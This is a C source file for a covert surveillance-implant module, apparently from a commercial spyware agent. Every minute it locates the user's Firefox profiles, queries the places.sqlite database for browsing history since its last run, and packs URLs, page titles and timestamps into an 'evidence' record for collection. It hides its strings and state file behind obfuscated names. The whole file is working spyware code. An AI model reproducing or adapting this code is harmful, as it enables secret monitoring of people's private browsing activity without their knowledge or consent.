#define _BSD_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <linux/limits.h>
#include <dlfcn.h>
#include <time.h>
#include <sqlite3.h>
#include <openssl/bio.h>

#include "module.h"
#include "evidencemanager.h"
#include "me.h"
#include "so.h"
#include "utfutils.h"

static void getmozilla(void);
static void getmozillaaccounts(const char *appname, const char *profiledir);
static int mozillacallback(void *arg, int num, char **val, char **key);

struct entry {
   char *browser;
   char *url;
   char *title;
   time_t time;
   struct entry *next;
};

static struct entry *list = NULL, *listp = NULL;
static time_t begin, end;

void *module_url_start(void *args)
{
   BIO *bio_data = NULL;
   int datalen, i;
   char *dataptr;
   FILE *fp = NULL;
   char line[32];
   struct tm t;
   
   debugme("Running module URL\n");

   while(MODULE_URL.status != MODULE_STOPPING) {
      if(MODULE_URL.status == MODULE_STARTING) MODULE_URL.status = MODULE_STARTED;

      do {
         begin = 0;
         if(!(fp = fopen(SO"fb2698c6", "r"))) break;
         if(!fgets(line, sizeof(line), fp)) break;
         begin = atoi(line);
      } while(0);
      if(fp) {
         fclose(fp);
         fp = NULL;
      }

      do {
         end = time(NULL);
         if(!(fp = fopen(SO"fb2698c6", "w"))) break;
         fprintf(fp, "%lu", end);
      } while(0);
      if(fp) {
         fclose(fp);
         fp = NULL;
      }

      do {
         getmozilla();

         debugme("- Url dump begin\n");
         for(listp = list; listp; listp = listp->next) debugme("--- %u %s %s %s\n", listp->time, listp->browser, listp->url, listp->title);
         debugme("- Url dump end\n");

         if(!(bio_data = BIO_new(BIO_s_mem()))) break;
         for(listp = list; listp; listp = listp->next) {
            memset(&t, 0, sizeof(t));
            if(listp->time) if(gmtime_r(&listp->time, &t)) {
               t.tm_mon++;
               t.tm_year += 1900;
            }
            if(BIO_write(bio_data, &t.tm_sec, 4) != 4) break;
            if(BIO_write(bio_data, &t.tm_min, 4) != 4) break;
            if(BIO_write(bio_data, &t.tm_hour, 4) != 4) break;
            if(BIO_write(bio_data, &t.tm_mday, 4) != 4) break;
            if(BIO_write(bio_data, &t.tm_mon, 4) != 4) break;
            if(BIO_write(bio_data, &t.tm_year, 4) != 4) break;
            if(BIO_write(bio_data, &t.tm_wday, 4) != 4) break;
            if(BIO_write(bio_data, &t.tm_yday, 4) != 4) break;
            if(BIO_write(bio_data, &t.tm_isdst, 4) != 4) break;
            if(BIO_write(bio_data, "\x13\x07\x10\x20", 4) != 4) break;
            if(listp->url[0]) if(BIO_puts16(bio_data, listp->url)) break;
            if(BIO_write(bio_data, "\x00\x00", 2) != 2) break;
            if(BIO_write(bio_data, "\x02\x00\x00\x00", 4) != 4) break;
            if(listp->title[0]) if(BIO_puts16(bio_data, listp->title)) break;
            if(BIO_write(bio_data, "\x00\x00", 2) != 2) break;
            if(BIO_write(bio_data, "\xDE\xC0\xAD\xAB", 4) != 4) break;
         }
         if(listp) break;

         if(!(datalen = BIO_get_mem_data(bio_data, &dataptr))) break;
         evidence_write(EVIDENCE_TYPE_URL, NULL, 0, dataptr, datalen);
      } while(0);

      if(bio_data) {
         BIO_free(bio_data);
         bio_data = NULL;
      }

      for(listp = list; listp;) {
         list = listp;
         listp = listp->next;
         if(list->browser) free(list->browser);
         if(list->url) free(list->url);
         if(list->title) free(list->title);
         free(list);
      }
      list = NULL;

      for(i = 60; i && (MODULE_URL.status != MODULE_STOPPING); i--) sleep(1);
   }

   MODULE_URL.status = MODULE_STOPPED;

   return NULL;
}

static void getmozilla(void)
{
   char profiles[PATH_MAX], profilepath[PATH_MAX], line[1024], *profiledir = NULL;
   FILE *fp = NULL;
   int relative = 1;

   do {
      if(snprintf(profiles, sizeof(profiles), SO"%s/.mozilla/firefox/profiles.ini", getenv(SO"HOME")) >= sizeof(profiles)) break;
      if(!(fp = fopen(profiles, "r"))) break;
      while(!feof(fp)) {
         if(!fgets(line, sizeof(line), fp)) break;
         if(!strncmp(line, SO"IsRelative=", strlen(SO"IsRelative="))) relative = atoi(line + strlen(SO"IsRelative="));
         if(!strncmp(line, SO"Path=", strlen(SO"Path="))) {
            profiledir = line + strlen(SO"Path=");
            while(profiledir[strlen(profiledir) - 1] == '\n') profiledir[strlen(profiledir) - 1] = '\0';
            if(relative) {
               if(snprintf(profilepath, sizeof(profilepath), SO"%s/.mozilla/firefox/%s", getenv(SO"HOME"), profiledir) >= sizeof(profilepath)) continue;
               profiledir = profilepath;
            }
            getmozillaaccounts(SO"firefox", profiledir);
         }
      }
   } while(0);
   if(fp) fclose(fp);
   fp = NULL;

   return;
}

static void getmozillaaccounts(const char *appname, const char *profiledir)
{
   sqlite3 *db = NULL;
   char places[PATH_MAX], query[256];;

   do {
      if(snprintf(places, sizeof(places), SO"%s/places.sqlite", profiledir) >= sizeof(places)) break;
      if(snprintf(query, sizeof(query), SO"SELECT url, title, visit_date/1000000 FROM moz_historyvisits JOIN moz_places ON moz_historyvisits.place_id = moz_places.id WHERE visit_date BETWEEN %lu000000 AND %lu999999 ORDER BY moz_historyvisits.id", begin, end - 1) >= sizeof(query)) break;

      if(sqlite3_open(places, &db) != SQLITE_OK) break;
      if(sqlite3_exec(db, query, mozillacallback, (void *)appname, NULL) != SQLITE_OK) break;
   } while(0);
   if(db) sqlite3_close(db);

   return;
}

static int mozillacallback(void *arg, int num, char **val, char **key)
{
   do {
      if(num != 3) break;

      if(!list) {
         if(!(list = malloc(sizeof(struct entry)))) break;
         listp = list;
      } else {
         if(!(listp->next = malloc(sizeof(struct entry)))) break;
         listp = listp->next;
      }

      listp->next = NULL;
      listp->browser = strdup(arg ? arg : "");
      listp->url = strdup(val[0] ? val[0] : "");
      listp->title = strdup(val[1] ? val[1] : "");
      listp->time = (time_t)(val[2] ? atoll(val[2]) : 0);
   } while(0);

   return 0;
}
